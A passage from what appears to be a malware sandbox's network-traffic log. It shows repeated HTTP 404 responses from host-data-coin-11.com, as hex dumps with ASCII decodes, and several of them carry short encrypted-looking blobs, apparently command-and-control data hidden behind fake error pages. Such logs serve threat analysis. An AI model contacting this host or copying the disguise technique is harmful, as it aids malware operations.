69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 14 Jan 2022 08:23:44 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
